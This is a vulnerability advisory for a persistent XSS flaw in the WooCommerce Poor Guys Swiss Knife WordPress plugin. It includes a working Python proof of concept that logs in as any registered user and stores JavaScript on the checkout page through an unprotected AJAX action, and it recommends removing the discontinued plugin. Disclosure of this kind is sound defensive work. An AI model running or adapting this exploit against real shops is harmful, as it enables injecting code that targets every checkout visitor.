WooCommerce Poor Guys Swiss Knife [Persistent XSS]

Description

WooCommerce Poor Guys Swiss Knife plugin for WordPress suffers from a Persistent XSS vulnerability. Plugin registers a wp_ajax action in order to save JS code to be included in checkout page. The plugin doesn’t check for appropriate user capabilities before saving the submitted JS code, so any registered user can call this action. After the JS code is saved it will be displayed to any user that visits the checkout page.

The attacker must have a valid user account to exploit this vulnerability but as this plugin is a WooCommerce enhancement and WooCommerce will have user registration open in most cases, acquiring a valid account should be trivial.

PoC

#!/usr/bin/python3

################################################################################
# WooCommerce Poor Guys Swiss Knife - Persistent XSS Exploit
#
# Author: Panagiotis Vagenas
# Site: http://pvagenas.com
################################################################################

import requests

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
ajaxUrl = baseUrl + '/wp-admin/admin-ajax.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

s = requests.Session()

r = s.post(loginUrl, loginPostData)

if r.status_code != 200:
    print('Login error')
    exit(1)

data = {
    'action': 'wcpgsk_save_checkoutjs',
    'checkoutjs': 'alert("XSS")'
}

r = s.post(ajaxUrl, data)

if r.text == 'js saved':
    print('Success')
else:
    print('Error')

exit(0)

Solution

As of March 2013 plugin author has taken down plugin home page. Plugin author never responded in our attempts to come in contact, so the only thing to assume is that this plugin is discontinued.

The only available solution is to remove this plugin from affected websites.